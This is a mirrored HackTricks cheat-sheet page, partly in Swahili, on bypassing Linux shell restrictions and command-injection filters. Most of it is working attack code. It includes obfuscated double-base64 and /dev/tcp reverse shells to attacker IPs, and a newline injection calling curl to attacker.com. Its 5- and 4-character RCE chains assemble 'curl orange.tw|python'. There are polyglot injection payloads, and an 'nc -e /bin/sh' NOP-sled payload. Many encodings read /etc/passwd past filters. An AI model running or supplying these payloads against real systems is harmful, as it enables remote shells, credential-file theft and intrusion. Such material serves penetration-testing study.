mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
341 lines
11 KiB
Markdown
341 lines
11 KiB
Markdown
# Bypass Linux Restrictions
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
## Common Limitations Bypasses
|
||
|
||
### Reverse Shell
|
||
```bash
|
||
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
|
||
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
|
||
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
|
||
```
|
||
### Short Rev shell
|
||
```bash
|
||
#Trick from Dikline
|
||
#Get a rev shell with
|
||
(sh)0>/dev/tcp/10.10.10.10/443
|
||
#Then get the out of the rev shell executing inside of it:
|
||
exec >&0
|
||
```
|
||
### Kupita Njia na Maneno Yaliyokatazwa
|
||
```bash
|
||
# Question mark binary substitution
|
||
/usr/bin/p?ng # /usr/bin/ping
|
||
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
|
||
|
||
# Wildcard(*) binary substitution
|
||
/usr/bin/who*mi # /usr/bin/whoami
|
||
|
||
# Wildcard + local directory arguments
|
||
touch -- -la # -- stops processing options after the --
|
||
ls *
|
||
echo * #List current files and folders with echo and wildcard
|
||
|
||
# [chars]
|
||
/usr/bin/n[c] # /usr/bin/nc
|
||
|
||
# Quotes
|
||
'p'i'n'g # ping
|
||
"w"h"o"a"m"i # whoami
|
||
ech''o test # echo test
|
||
ech""o test # echo test
|
||
bas''e64 # base64
|
||
|
||
#Backslashes
|
||
\u\n\a\m\e \-\a # uname -a
|
||
/\b\i\n/////s\h
|
||
|
||
# $@
|
||
who$@ami #whoami
|
||
|
||
# Transformations (case, reverse, base64)
|
||
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
|
||
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
|
||
$(rev<<<'imaohw') #whoami
|
||
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
|
||
|
||
# Execution through $0
|
||
echo whoami|$0
|
||
|
||
# Uninitialized variables: A uninitialized variable equals to null (nothing)
|
||
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
|
||
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
|
||
|
||
# New lines
|
||
p\
|
||
i\
|
||
n\
|
||
g # These 4 lines will equal to ping
|
||
|
||
# Fake commands
|
||
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
|
||
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
|
||
|
||
# Concatenation of strings using history
|
||
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
|
||
mi # This will throw an error
|
||
whoa # This will throw an error
|
||
!-1!-2 # This will execute whoami
|
||
```
|
||
### Pita maeneo yaliyokatazwa
|
||
```bash
|
||
# {form}
|
||
{cat,lol.txt} # cat lol.txt
|
||
{echo,test} # echo test
|
||
|
||
# IFS - Internal field separator, change " " for any other character ("]" in this case)
|
||
cat${IFS}/etc/passwd # cat /etc/passwd
|
||
cat$IFS/etc/passwd # cat /etc/passwd
|
||
|
||
# Put the command line in a variable and then execute it
|
||
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
|
||
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
|
||
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
|
||
# Other way, just change each space for ${IFS}
|
||
echo${IFS}test
|
||
|
||
# Using hex format
|
||
X=$'cat\x20/etc/passwd'&&$X
|
||
|
||
# Using tabs
|
||
echo "ls\x09-l" | bash
|
||
|
||
# Undefined variables and !
|
||
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
|
||
uname!-1\-a # This equals to uname -a
|
||
```
|
||
### Pita nyuma ya backslash na slash
|
||
```bash
|
||
cat ${HOME:0:1}etc${HOME:0:1}passwd
|
||
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
||
```
|
||
### Pita mabomba
|
||
```bash
|
||
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|
||
```
|
||
### Bypass na hex encoding
|
||
```bash
|
||
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
|
||
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
|
||
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
|
||
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
|
||
cat `xxd -r -p <<< 2f6574632f706173737764`
|
||
xxd -r -ps <(echo 2f6574632f706173737764)
|
||
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
|
||
```
|
||
### Bypass IPs
|
||
```bash
|
||
# Decimal IPs
|
||
127.0.0.1 == 2130706433
|
||
```
|
||
### Uhamasishaji wa data kulingana na muda
|
||
```bash
|
||
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
|
||
```
|
||
### Kupata herufi kutoka kwa Mabadiliko ya Mazingira
|
||
```bash
|
||
echo ${LS_COLORS:10:1} #;
|
||
echo ${PATH:0:1} #/
|
||
```
|
||
### DNS data exfiltration
|
||
|
||
Unaweza kutumia **burpcollab** au [**pingb**](http://pingb.in) kwa mfano.
|
||
|
||
### Builtins
|
||
|
||
Iwapo huwezi kutekeleza kazi za nje na una ufikiaji tu wa **seti ndogo ya builtins kupata RCE**, kuna mbinu kadhaa za kufanya hivyo. Kawaida **hutoweza kutumia zote** za **builtins**, hivyo unapaswa **kujua chaguzi zako zote** ili kujaribu kupita gerezani. Wazo kutoka [**devploit**](https://twitter.com/devploit).\
|
||
Kwanza kabisa angalia zote [**shell builtins**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html)**.** Hapa kuna baadhi ya **mapendekezo**:
|
||
```bash
|
||
# Get list of builtins
|
||
declare builtins
|
||
|
||
# In these cases PATH won't be set, so you can try to set it
|
||
PATH="/bin" /bin/ls
|
||
export PATH="/bin"
|
||
declare PATH="/bin"
|
||
SHELL=/bin/bash
|
||
|
||
# Hex
|
||
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
|
||
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
|
||
|
||
# Input
|
||
read aaa; exec $aaa #Read more commands to execute and execute them
|
||
read aaa; eval $aaa
|
||
|
||
# Get "/" char using printf and env vars
|
||
printf %.1s "$PWD"
|
||
## Execute /bin/ls
|
||
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
|
||
## To get several letters you can use a combination of printf and
|
||
declare
|
||
declare functions
|
||
declare historywords
|
||
|
||
# Read flag in current dir
|
||
source f*
|
||
flag.txt:1: command not found: CTF{asdasdasd}
|
||
|
||
# Read file with read
|
||
while read -r line; do echo $line; done < /etc/passwd
|
||
|
||
# Get env variables
|
||
declare
|
||
|
||
# Get history
|
||
history
|
||
declare history
|
||
declare historywords
|
||
|
||
# Disable special builtins chars so you can abuse them as scripts
|
||
[ #[: ']' expected
|
||
## Disable "[" as builtin and enable it as script
|
||
enable -n [
|
||
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
|
||
chmod +x [
|
||
export PATH=/tmp:$PATH
|
||
if [ "a" ]; then echo 1; fi # Will print hello!
|
||
```
|
||
### Uingiliaji wa amri za polyglot
|
||
```bash
|
||
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
|
||
```
|
||
### Pita regexes zinazoweza kutokea
|
||
```bash
|
||
# A regex that only allow letters and numbers might be vulnerable to new line characters
|
||
1%0a`curl http://attacker.com`
|
||
```
|
||
### Bashfuscator
|
||
```bash
|
||
# From https://github.com/Bashfuscator/Bashfuscator
|
||
./bashfuscator -c 'cat /etc/passwd'
|
||
```
|
||
### RCE na herufi 5
|
||
```bash
|
||
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
|
||
#Oragnge Tsai solution
|
||
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
|
||
http://host/?cmd=>ls\
|
||
http://host/?cmd=ls>_
|
||
http://host/?cmd=>\ \
|
||
http://host/?cmd=>-t\
|
||
http://host/?cmd=>\>g
|
||
http://host/?cmd=ls>>_
|
||
|
||
## Step2: generate `curl orange.tw|python` to file "g"
|
||
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
|
||
http://host/?cmd=>on
|
||
http://host/?cmd=>th\
|
||
http://host/?cmd=>py\
|
||
http://host/?cmd=>\|\
|
||
http://host/?cmd=>tw\
|
||
http://host/?cmd=>e.\
|
||
http://host/?cmd=>ng\
|
||
http://host/?cmd=>ra\
|
||
http://host/?cmd=>o\
|
||
http://host/?cmd=>\ \
|
||
http://host/?cmd=>rl\
|
||
http://host/?cmd=>cu\
|
||
http://host/?cmd=sh _
|
||
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
|
||
|
||
## Finally execute the file "g"
|
||
http://host/?cmd=sh g
|
||
|
||
|
||
# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
|
||
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
|
||
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
|
||
## Execute tar command over a folder
|
||
http://52.199.204.34/?cmd=>tar
|
||
http://52.199.204.34/?cmd=>zcf
|
||
http://52.199.204.34/?cmd=>zzz
|
||
http://52.199.204.34/?cmd=*%20/h*
|
||
|
||
# Another curiosity if you can read files of the current folder
|
||
ln /f*
|
||
## If there is a file /flag.txt that will create a hard link
|
||
## to it in the current folder
|
||
```
|
||
### RCE na herufi 4
|
||
```bash
|
||
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
|
||
# it will follow the same principle of creating the command `ls -t>g` in a file
|
||
# and then generate the full command in filenames
|
||
# generate "g> ht- sl" to file "v"
|
||
'>dir'
|
||
'>sl'
|
||
'>g\>'
|
||
'>ht-'
|
||
'*>v'
|
||
|
||
# reverse file "v" to file "x", content "ls -th >g"
|
||
'>rev'
|
||
'*v>x'
|
||
|
||
# generate "curl orange.tw|python;"
|
||
'>\;\\'
|
||
'>on\\'
|
||
'>th\\'
|
||
'>py\\'
|
||
'>\|\\'
|
||
'>tw\\'
|
||
'>e.\\'
|
||
'>ng\\'
|
||
'>ra\\'
|
||
'>o\\'
|
||
'>\ \\'
|
||
'>rl\\'
|
||
'>cu\\'
|
||
|
||
# got shell
|
||
'sh x'
|
||
'sh g'
|
||
```
|
||
## Read-Only/Noexec/Distroless Bypass
|
||
|
||
Ikiwa uko ndani ya mfumo wa faili wenye **kinga za read-only na noexec** au hata katika kontena lisilo na mfumo, bado kuna njia za **kutekeleza binaries zisizo na mipaka, hata shell!:**
|
||
|
||
{{#ref}}
|
||
bypass-fs-protections-read-only-no-exec-distroless/
|
||
{{#endref}}
|
||
|
||
## Chroot & other Jails Bypass
|
||
|
||
{{#ref}}
|
||
../privilege-escalation/escaping-from-limited-bash.md
|
||
{{#endref}}
|
||
|
||
## Space-Based Bash NOP Sled ("Bashsledding")
|
||
|
||
Wakati udhaifu unakuruhusu kudhibiti sehemu ya hoja ambayo hatimaye inafikia `system()` au shell nyingine, huenda usijue offset halisi ambapo utekelezaji unaanza kusoma payload yako. NOP sleds za jadi (mfano `\x90`) **hazifanyi kazi** katika sintaksia ya shell, lakini Bash itapuuzilia mbali nafasi za mbele kabla ya kutekeleza amri.
|
||
|
||
Hivyo unaweza kuunda *NOP sled kwa Bash* kwa kuweka amri yako halisi kwa mfululizo mrefu wa nafasi au tab characters:
|
||
```bash
|
||
# Payload sprayed into an environment variable / NVRAM entry
|
||
" nc -e /bin/sh 10.0.0.1 4444"
|
||
# 16× spaces ───┘ ↑ real command
|
||
```
|
||
Ikiwa mnyororo wa ROP (au primitive yoyote ya kuharibu kumbukumbu) unatua pointer ya maagizo mahali popote ndani ya block ya nafasi, parser ya Bash inaruka tu nafasi za wazi hadi inafikia `nc`, ikitekeleza amri yako kwa uaminifu.
|
||
|
||
Matumizi halisi:
|
||
|
||
1. **Blobs za usanidi zilizopangwa kwa kumbukumbu** (kwa mfano NVRAM) ambazo zinapatikana kati ya michakato.
|
||
2. Hali ambapo mshambuliaji hawezi kuandika bytes za NULL ili kuoanisha payload.
|
||
3. Vifaa vilivyojumuishwa ambavyo vinaweza tu kutumia BusyBox `ash`/`sh` – pia vinapuuzilia mbali nafasi za mbele.
|
||
|
||
> 🛠️ Changanya hila hii na vifaa vya ROP vinavyopiga simu `system()` ili kuongeza kwa kiasi kikubwa uaminifu wa exploit kwenye route za IoT zenye ukosefu wa kumbukumbu.
|
||
|
||
## Marejeleo na Zaidi
|
||
|
||
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
|
||
- [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
|
||
- [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
|
||
- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
|
||
|
||
- [Exploiting zero days in abandoned hardware – Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/)
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|